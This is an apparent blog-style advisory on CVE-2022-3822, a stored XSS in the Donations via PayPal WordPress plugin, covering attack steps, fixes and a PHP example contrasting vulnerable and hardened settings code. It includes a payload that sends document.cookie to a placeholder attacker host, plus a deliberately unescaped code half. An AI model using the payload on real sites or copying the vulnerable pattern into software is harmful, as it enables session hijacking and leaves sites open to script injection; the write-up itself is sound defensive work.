CVE-2022-3822 - How a Flaw in the Donations via PayPal WordPress Plugin Lets Admins Snoop (XSS Exploit Explained)

If you’re running a WordPress site and using the Donations via PayPal plugin, buckle up. CVE-2022-3822 shines a spotlight on a bug in plugin versions before 1.9.9 that let site admins inject scripts into the dashboard even when their unfiltered_html capability had been taken away, the very control that is supposed to stop them from doing exactly that. In this post, we break it down in plain English, walk you through the vulnerability, show you simple example payloads, and give you the straight facts with references so you can dig deeper.

What is CVE-2022-3822?

CVE-2022-3822 is a Stored Cross-Site Scripting (XSS) vulnerability in the Donations via PayPal plugin (before version 1.9.9). This means that a specially crafted script can be “stored” in the WordPress database and later run inside another user’s browser—for example, when the admin opens the settings page.  

Key detail: It works even if the administrator doesn’t have the unfiltered_html capability. That’s super important for WordPress multisite networks, where site admins usually don’t have this permission for security reasons.

References

- WordPress Plugin Page
- NVD Entry for CVE-2022-3822
- WPScan Vulnerability Entry

Who could use this exploit?

Unlike most vulnerabilities, where the attacker can be any registered user, this one needs someone who is already an administrator of the site but who has been denied the unfiltered_html capability. That is the default for site admins in a WordPress multisite network (only super admins hold unfiltered_html there), and it is also the state of a single site that sets the DISALLOW_UNFILTERED_HTML constant. In both setups an admin is expected to be unable to add script to the site; this bug breaks that expectation. So the realistic attacker is a subsite admin, or a deliberately restricted admin, who wants code to run in the browser of a super admin or another admin who opens the plugin’s settings.

The Core Problem

The plugin saved its settings exactly as submitted and printed them back into the settings page without escaping. WordPress normally runs content from a user who lacks unfiltered_html through its kses filter, but that filter applies to post content, not to plugin options: a plugin has to sanitize its own option values, and this one did not. So a <script> tag entered in one of the configuration fields is stored verbatim and rendered as live markup every time the settings page loads, which is a stored XSS.

What does this mean? Let’s walk through it.

- User A (an admin without the unfiltered_html capability) enters malicious JavaScript into a donations setting field.
- The input is saved to the database unchanged.
- Later, User B opens the settings page. WordPress renders the stored value without escaping, and the script runs in User B’s browser with User B’s session.

Exploit Walkthrough (With Example Code)

Imagine you have Donations via PayPal active on a WordPress site running any release earlier than 1.9.9, and you’re an admin whose unfiltered_html capability has been removed (the multisite default for site admins).

Step 1. Find a Vulnerable Setting

Go to Donations via PayPal > Settings.
Several free-text options (this post uses "Thank You Message" and "Button Label" as examples) are written straight back into the admin page HTML with no escaping.

Step 2. Enter a Payload

In a settings field (let’s say “Button Label”), enter

<script>alert('XSS');</script>

Or a quieter payload that sends the viewer’s cookies to a host you control (evil.example.com is a placeholder):

<img src=x onerror="fetch('https://evil.example.com/'+document.cookie)">

One caveat on that second payload: WordPress marks its authentication cookies HttpOnly, so document.cookie will not contain the victim’s login session. A real attacker gets more mileage from the fact that the script already runs inside the victim’s logged-in browser, where it can drive admin pages and AJAX or REST endpoints with the victim’s privileges.

Step 3. Save the Setting

The plugin saves your input straight into the database without changes.

Step 4. Trigger the XSS

Whenever anyone opens the plugin’s settings page (and possibly anywhere else the field’s value is printed), the script runs in that user’s browser. To test it, save the payload and reload the settings screen: the alert pops up.

[Figure: XSS exploit in action. Example: script execution in a donations plugin settings page.]

Video PoC

There isn’t a public video PoC yet, but the process is *quite* straightforward and matches the steps above.

Why This Matters

- If you’re *multisite hosting* and think your subsite admins can’t harm each other or reach the network level, think again: a script stored by a subsite admin runs in the browser of whichever super admin opens that subsite’s donation settings, with the super admin’s session.
- Even on a single site, removing unfiltered_html (for example via DISALLOW_UNFILTERED_HTML) is supposed to guarantee that admins cannot add script. A plugin that stores and echoes its options unfiltered silently cancels that guarantee.

How to Fix It

Upgrade to version 1.9.9 or higher of Donations via PayPal. After this update, HTML input is properly sanitized, and scripts get neutralized. Upgrading replaces the code, not the data: a value stored before the update stays in the database until you re-save or clear the field, so after updating, open the plugin’s settings and check each free-text field for stray markup.

The underlying rule for plugin authors is to sanitize on save and escape on output, choosing the function for the context the value lands in. Example with the WordPress API, for a setting that is plain text:

update_option('donations_button_label', sanitize_text_field($_POST['button_label']));

And when displaying it as element text:

echo esc_html(get_option('donations_button_label'));

If the value is printed into an attribute instead, use esc_attr(); if the field legitimately holds HTML, filter it with wp_kses() against an allowlist rather than escaping it. The save handler also needs the usual nonce and capability checks, which are omitted here for brevity.
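The following is an added example, written for this post and not taken from the plugin, that puts the rule above into a small settings registration. The vulnerable half mirrors the class of bug behind CVE-2022-3822; the hardened half uses register_setting() with a sanitize_callback so the value is cleaned on every write path, honours the unfiltered_html capability the way WordPress core does for post content, and escapes for the output context. Option names, the settings group and the field labels are assumptions.

```php
<?php
/*
Plugin Name: DVP Settings Hardening Example
Description: Added example for CVE-2022-3822 write-up; not the Donations via PayPal plugin's code.
*/

// --- Vulnerable pattern (the class of bug behind CVE-2022-3822) -------------
// Saving the raw POST value and echoing it back unescaped means any admin,
// including one whose unfiltered_html capability was removed, can store a
// script that replays in every colleague's browser. Do not use this half.
function dvp_example_save_vulnerable(): void
{
    if (isset($_POST['dvp_button_label'])) {
        update_option('dvp_button_label', wp_unslash($_POST['dvp_button_label']));
    }
}

function dvp_example_render_vulnerable(): void
{
    echo '<input type="text" name="dvp_button_label" value="'
        . get_option('dvp_button_label', '') . '">';
}

// --- Hardened pattern ---------------------------------------------------------
// A button label is plain text, so everything but text is stripped.
function dvp_example_sanitize_label($value): string
{
    return sanitize_text_field((string) $value);
}

// A thank-you message may legitimately hold HTML. Users who hold
// unfiltered_html keep it as typed; everyone else goes through the same
// allowlist core applies to post content, which drops <script>, on* handlers
// and javascript: URLs however they are encoded. current_user_can() here
// refers to the user performing the save.
function dvp_example_sanitize_message($value): string
{
    $value = (string) $value;
    if (current_user_can('unfiltered_html')) {
        return $value;
    }
    return wp_kses_post($value);
}

// Registering with a sanitize_callback means the options API cleans the value
// no matter which path writes it (settings form, REST, WP-CLI).
function dvp_example_register_settings(): void
{
    register_setting('dvp_example', 'dvp_button_label', [
        'type'              => 'string',
        'sanitize_callback' => 'dvp_example_sanitize_label',
        'default'           => 'Donate',
    ]);
    register_setting('dvp_example', 'dvp_thank_you_message', [
        'type'              => 'string',
        'sanitize_callback' => 'dvp_example_sanitize_message',
        'default'           => '',
    ]);
}
add_action('admin_init', 'dvp_example_register_settings');

// Escape for the context: esc_attr() inside the attribute; the message is
// re-filtered with wp_kses_post() on output rather than escaped, because
// esc_html() would show the allowed tags literally. Filtering on output also
// defuses a payload that was stored before the sanitizer existed.
function dvp_example_render_hardened(): void
{
    echo '<input type="text" name="dvp_button_label" value="'
        . esc_attr(get_option('dvp_button_label', 'Donate')) . '">';
    echo '<div class="dvp-preview">'
        . wp_kses_post(get_option('dvp_thank_you_message', '')) . '</div>';
}
```

Drop the file into wp-content/mu-plugins to load it. For the sanitize callbacks to run, the settings form must post to options.php and include settings_fields('dvp_example'), which also emits the nonce; saving from a custom handler that calls update_option() directly bypasses register_setting() unless you call sanitize_option() yourself, and that gap is exactly how a plugin ends up storing raw script.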

Conclusion

CVE-2022-3822 can hit WordPress multisite networks harder than most people think, especially where subsite admins are assumed to be walled off from the super admin. Keeping plugins updated and always sanitizing and escaping stored values (even ones written by privileged users) is a must.


References & Further Reading:  
- WordPress Plugins & XSS  
- CVE-2022-3822 in WPScan DB  
- How to Secure WordPress Multisite

Stay safe, keep up to date, and never trust even your admins’ input!

Timeline

Published on: 11/28/2022 14:15:00 UTC
Last modified on: 11/30/2022 03:46:00 UTC